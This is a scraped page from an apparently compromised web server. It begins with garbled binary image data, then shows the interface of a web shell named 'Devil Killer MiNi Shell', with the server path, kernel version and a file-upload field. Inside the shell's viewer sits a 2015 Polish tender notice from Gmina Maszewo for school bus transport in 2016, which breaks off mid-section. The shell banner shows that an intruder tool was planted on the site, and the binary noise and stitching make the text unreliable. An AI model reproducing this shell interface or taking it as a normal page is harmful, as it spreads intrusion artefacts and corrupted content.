JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151127/174909-N-2015.html

<p class="kh_header"><b>Maszewo: Świadczenie usług przewozowych w zakresie dowozu i odwozu  uczniów do i ze Szkół Podstawowych, Przedszkola Miejskiego  i Gimnazjum   na terenie Gminy Maszewo  oraz   uczniów niepełnosprawnych z Gminy Maszewo, Goleniów do Placówek Oświatowych w Goleniowie i Przybiernowie w 2016r. na podstawie biletów miesięcznych szkolnych umożliwiających przejazdy uczniów w komunikacji regularnej z wyłączeniem okresu wakacyjnego</b><br>
<b>Numer ogłoszenia: 174909 - 2015; data zamieszczenia: 27.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Maszewo , Plac Wolności 2, 72-130 Maszewo, woj. zachodniopomorskie, tel. 91 418 78 43, faks 91 418 75 06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.maszewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozowych w zakresie dowozu i odwozu  uczniów do i ze Szkół Podstawowych, Przedszkola Miejskiego  i Gimnazjum   na terenie Gminy Maszewo  oraz   uczniów niepełnosprawnych z Gminy Maszewo, Goleniów do Placówek Oświatowych w Goleniowie i Przybiernowie w 2016r. na podstawie biletów miesięcznych szkolnych umożliwiających przejazdy uczniów w komunikacji regularnej z wyłączeniem okresu wakacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest  Świadczenie usług przewozowych w zakresie dowozu i odwozu  uczniów do i ze Szkół Podstawowych, Przedszkola Miejskiego  i Gimnazjum   na terenie Gminy Maszewo  oraz   uczniów niepełnosprawnych z Gminy Maszewo, Goleniów do Placówek Oświatowych w Goleniowie i Przybiernowie w 2016r. na podstawie biletów miesięcznych szkolnych umożliwiających przejazdy uczniów w komunikacji regularnej z wyłączeniem okresu wakacyjnego
.1.1 Pierwszeństwo przejazdu mają uczniowie z biletem miesięcznym zakupionym przez Zamawiającego u Wykonawcy w czasie przejazdu do szkół - od poniedziałku do piątku z wyłączeniem: dni wolnych od pracy określonych w ustawie z dnia 18 stycznia 1951 r. o dniach wolnych od pracy (Dz. U. z 1951 r. Nr 4, poz. 28 z późn. zm.) oraz zgodnie z organizacją roku szkolnego określoną rozporządzeniem MENiS z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. z 2002 r. Nr 46, poz. 432 z późn. zm.).
1.2  Szczegółowy opis  przedmiotu  zamówienia zawarty  jest  w    :
   -  Załączniku  nr 1 do SIWZ,  z uwzględnieniem  poszczególnych  części    ,
   - Załączniku nr 2 do SIWZ, określającym godziny odjazdów i powrotów z uwzględnieniem    poszczególnych  części    
  - załączniku nr 3 do SIWZ- projekt umowy 
1.3  Przedmiot zamówienia został podzielony na cztery części. 
I Część  : Przewóz uczniów do Szkoły Podstawowej w Rożnowie Nowogardzkim, do Gimnazjum w Maszewie  i Szkoły Podstawowej w Maszewie.
II Część  : Przewozy dzieci do Gimnazjum w Maszewie, Szkoły Podstawowej w Maszewie i Przedszkola Miejskiego w Maszewie.
III Cześć  : Przewozy dzieci do Gimnazjum w Maszewie i Szkoły Podstawowej w Dębicach oraz Szkoły Podstawowej w Maszewie.
          IV Część : Przewozy dzieci niepełnosprawnych do szkół i placówek w Goleniowie i Przybiernowie.
1.4  Każdy wykonawca może złożyć ofertę na dowolną ilość części.
      1.5 Przystanki docelowe znajdują się przy szkołach, natomiast z przystanków (punktów zbiorczych) na trasie         Wykonawca  będzie korzystał według  zezwolenia  na wykonywanie zawodu przewoźnika drogowego
  1.6  Ilości dzieci dowożonych oraz trasy przewozów zawiera  Załącznik Nr 1 do SIWZ.
      1.7 Godziny odjazdów i powrotów zawiera Załącznik Nr 2  do SIWZ
  1.7 Ilości dzieci dowożonych oraz trasy przewozów zawiera załącznik Nr 1 do SIWZ.
               Łączna ilość dzieci dowożonych  (liczba szacunkowa, może ulec zmianom +/- 5%). 
1.8 Uczniowie  w miejscowości zamieszkania wsiadać i wysiadać będą na przystankach lub do tego wyznaczonych miejscach, a wysiadać przy szkole/przedszkolu. Natomiast powroty ze szkół z terenu szkoły lub miejsc przy szkołach/przedszkolu do tego wyznaczonych. Natomiast uczniowie z części Nr 4 odbierani będą z miejsca zamieszkania lub przystanku i dowożeni pod samą szkołę -  powrót odwrotnie.
  2.   Wymagania  dotyczące realizacji przedmiotu zamówienia  dla każdej części zamówienia:
2.1  Wykonawca jest zobowiązany do zapewnienia transportu uczniów do szkół i ze szkół  autobusami  lub  busami , którymi  będzie dysponował na potrzeby realizacji zamówienia . 
2.2.	Autobusy lub busy, którymi będzie dokonywany transport uczniów muszą być sprawne i wyposażone w miejsca siedzące dla uczniów.
2.3.	Szczegółowe miejsca, terminy i godziny przewozu do szkół i ze szkół ustalone zostaną z  dyrektorami szkół i wykonawcą po wyborze oferty.
      2 .4   Podana liczba uczniów jest tylko prognozą i w czasie trwania umowy będzie ulegała zmianie +/- 5%). 
    2.5  Zamawiający zastrzega sobie możliwość zmiany czasu dowozu i odwozu w zależności od rozkładu zajęć  lekcyjnych.
2.6  Wykonawca jest zobowiązany do wykonania minimalnej liczby kursów na danej trasie w ciągu jednego dnia szkolnego.
2.7 Celowym jest, aby każdy z wykonawców dokonał wizji lokalnej trasy na której będzie się odbywał przewóz   uczniów celem sprawdzenia właściwej ilości kilometrów.
2.8   Przewozy, które są objęte niniejszym zamówieniem mają być kursami otwartymi - z pierwszeństwem dla uczniów szkolnych.
2.9  Zamawiający w trakcie trwania umowy w roku szkolnym będzie przekazywał Wykonawcy aktualną liczbę uczniów korzystających z przewozów szkolnych.
   2.10 Wykonawca zobowiązany jest do wykonania i podania do publicznej wiadomości rozkładów jazdy przez zamieszczenie informacji na wszystkich przystankach, na których Wykonawca będzie się zatrzymywał w miejscowościach wymienionych w załączniku Nr 1a.
2.11	Wykonawca zobowiązany jest w terminie na 7 dni przed rozpoczęciem dowozów dostarczyć Zamawiającemu niżej  wymienione dokumenty dot. zatrudnionych opiekunów dowozu:
-         wykaz  opiekunów 
-	oświadczenie opiekuna o niekaralności,
-	kserokopia zaświadczenia o odbyciu szkolenia BHP. 
2.12 Pojazdy muszą być sprawne technicznie. Niedopuszczalne jest np.: przedostawanie się do wnętrza pojazdu spalin i innych nieprzyjemnych zapachów pocho?dzących od pracującego silnika lub innych podzespołów pojazdu, wyciekanie oleju lub paliwa.
2.13	 Pojazdy muszą spełniać wymagania techniczne określone ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 poz. 1137 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2013 r., poz. 951 z późn. zm.). 
2.14	 Wielkość pojazdu dowożącego uczniów musi być dostosowana do liczby przewożonych uczniów, zgodnie z § 22 ust. 1 pkt 5 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz ich niezbędnego wyposażenia (Dz. U z 2013 r. poz. 951 z późń. zm.).
2.15	 Pojazdy o masie własnej do 6 ton muszą jeździć na oponach zimowych od dnia 1 listopada do dnia 31 marca.
2.16	 Zamawiający ma prawo wprowadzania zmian w trasach przewozów uczniów do szkół, a Wykonawca zobowiązuje się do ich realizacji pod warunkiem, że zmiany nie wykraczającej poza przedmiot zamówienia. Zmiany mogą być wprowadzone, jeżeli wystąpią niżej wymienione okoliczności:
a)	w sytuacji wystąpienia robót drogowych lub innych przeszkód drogowych uniemożliwiających jazdę dotychczas ustaloną trasą, Zamawiający ustali zmianę w trasie przejazdu zaproponowaną przez Wykonawcę,
b)	w sytuacji zmiany rozkładu zajęć w szkołach lub liczby dowożonych uczniów Zamawiający ustali zmiany w trasach, tj. między innymi zmiany długości trasy, godziny przyjazdu i/lub odjazdu, zmiany dnia dowozu i odwozu na sobotę w sytuacji odpracowania zajęć.
2.17	 W czasie trwania realizacji zamówienia musi być zapewniona stała obsługa przewozów pasażerów, także w przypadku awarii pojazdu lub innych zdarzeń losowych. Wykonawca zobowiązany jest do podstawienia w tych sytuacjach pojazdu zastępczego w niezwłocznym czasie. W przypadku niepodstawienia pojazdu zastępczego i konieczności wynajęcia pojazdu przez Gminę, Wykonawca zostanie obciążony pełnymi kosztami wynajęcia pojazdu. 
2.18	 Wykonawca nie ponosi odpowiedzialności za niewykonanie lub spóźnienie przewozu wskutek działania siły wyższej rozumianej jako zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia.
2.19	 Przez okres realizacji zamówienia Wykonawca zobowiązany jest posiadać opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia min 1 000 000,00 zł.
2.20	 Pojazdy, którymi przewoźnik wykonuje usługi przewozowe, muszą być czyste wewnątrz i z zewnątrz, a ich wystrój zewnętrzny i wewnętrzny musi być estetyczny. Za pojazd czysty uważa się pojazd, w którym w momencie rozpoczęcia pracy przewozowej:
a)	wewnątrz pojazdu na siedzeniach i podłogach nie ma widocznych zanieczyszczeń np. błota, kurzu, a na szybach i ramach okiennych, po przesunięciu po nich tkaniny, nie pozostają ślady,
b)	zewnętrzna część pojazdu nie jest pokryta kurzem lub błotem, przy czym kary za brak czystości zewnętrznej pojazdu nie nalicza się jeśli temperatura zewnętrzna spada poniżej minus 5oC,
c)	  przy temperaturze zewnętrznej poniżej 0oC, pojazdy muszą być ogrzewane tak, że temperatura   wewnątrz pojazdu będzie wynosiła co najmniej plus 10oC.
2.21	 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi, stanowiących nie więcej niż 50% wartości zamówienia podstawowego ( odpowiednio dla danej części zamówienia  i polegających na powtórzeniu tego samego rodzaju zamówienia zgodnych z przedmiotem zamówienia podstawowego ( odpowiednio dla danej części zamówienia) . Rodzaj usług, których zamówienie Zamawiający przewiduje jako uzupełniające jest opisany w opisie przedmiotu zamówienia i ofercie Wykonawcy. Wartości przyjęte w ofercie przez Wykonawcę będą podstawą do negocjacji cen dla zamówienia uzupełniającego, biorąc pod uwagę  czynniki   wpływające na  ewentualną  zmianę ceny jednostkowej  .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału  w postępowaniu  jest posiadanie  uprawnień do prowadzenia działalności  gospodarczej w zakresie   przewozów regularnych tj.   
a)  aktualnej  licencji, o której mowa w art. 5 ust. 1 ustawy z dnia 5 kwietnia 2013 r. o zmianie ustawy o transporcie drogowym oraz o czasie pracy kierowców (Dz. U. z 2013 r. poz. 564 z późn. zm.) 
 b) aktualnego zezwolenia na wykonywanie zawodu przewoźnika drogowego, o którym mowa w art. 12 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2013 r., poz. 1414 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy należycie wykonali ,  a w przypadku świadczeń okresowych lub ciągłych również należycie wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno  zamówienie   w zakresie  transportu zorganizowanego o wartości min.  50  000 zł 
  Obowiązek wykazania  doświadczenia jak wyżej  obowiązuje  niezależnie  od tego czy Wykonawca    składa ofertę  na jedną część zamówienia, czy na więcej .  
   Dla uzyskania wymaganej wartości zamówienia 50 000 nie  można sumować zamówień wykonywanych na zlecenie kilku podmiotów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy  dysponują lub będą dysponować dopuszczonymi do ruchu pojazdami do przewozu osób do prawidłowej realizacji zamówienia  :
                    dla Części I  zamówienia    -  min  1 autobusem  z  min 54 miejscami  
                    dla Części II  zamówienia  -   min 2 autobusami  z min 54 miejsca każdy  
                    dla Części III  zamówienia  -  min 3 autobusami  z min 54 miejsca każdy   
          dla Części I V zamówienia  -  min 2 busy :  w tym :
a) min 1 bus  - na min. 15 osób,  przystosowany do poruszania się osób na wózku inwalidzkim 
 ( min. 2 osoby)  i wyposażony w pasy bezpieczeństwa typu samolotowego (freeling harneessees),
           b) min 1 bus lub autobus - na mim. 23 osoby., 
Do oferty należy dołączyć kserokopie dowodów rejestracyjnych pojazdów, którymi Wykonawca ma zamiar przewozić uczniów. Dowody rejestracyjne mają być skopiowane w taki sposób, aby Zamawiający mógł odczytać liczbę miejsc siedzących i stojących.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  dysponowania osobami  zdolnymi do wykonywania zamówienia spełnią Wykonawcy, którzy wykażą  dysponowanie osobami:
a)	co najmniej :
              
                dla Części I  zamówienia  -   1  kierowcą 
                dla Części II  zamówienia  -  2  kierowcami    
                dla Części III  zamówienia  - 3 kierowcami 
      dla Części I V zamówienia  -  2 kierowcami   

5.1.5 Dodatkowo Zamawiający  wymaga  przedłożenia  oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia jako kierowcy, posiadają wymagane uprawnienia  do świadczenia usług będących  przedmiotem przyszłej umowy
 ( Kierowcy  autobusów muszą  posiadać uprawnienie do prowadzenia pojazdów , przewidziane w Ustawie z dnia 20.06.1997 - Prawo o ruchu drogowym (Dz. U .Nr 98 poz. 602), oraz Ustawie z dnia 06.09.2001 r. o zmianie ustawy Prawo o ruchu drogowym ( Dz. U. Nr. 129 poz. 1444 z 2001r. z późniejszymi zmianami) oraz aktualne świadectwa kwalifikacji) . 
               b) co najmniej :
    dla  Części I  zamówienia  -  1  osobą  do sprawowania  opieki nad  dziećmi i młodzieżą ,                
    dla Części II  zamówienia - 2  osobami  do sprawowania  opieki nad  dziećmi i młodzieżą ,                             dla Części III  zamówienia - 3 osobami  do sprawowania  opieki nad  dziećmi i młodzieżą,                                  dla   Części  IV zamówienia  -  2 osobami  do sprawowania  opieki nad  dziećmi i młodzieżą,                             
              podczas  wsiadania do środka transportu, przewozu i wysiadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego  warunku w tym zakresie . Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą  oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie
w wykazie należy wskazać jedynie główne dostawy tj. potwierdzające spełnienie warunku o którym mowa w pkt III.3. 2)  tj . co najmniej jednego   zamówienia   w zakresie  transportu zorganizowanego o wartości min.  5 0  000 zł 
Wykonawca wraz z wykazem zobowiązany jest przedłożyć potwierdzające, że przedstawione w ww. wykazie zamówienia zostały wykonane lub są wykonywane należycie . Dowodami są: 1) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych zamówień okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 2) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1). 3) W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie o którym mowa w pkt III.4.1 zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 1) i 2);;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
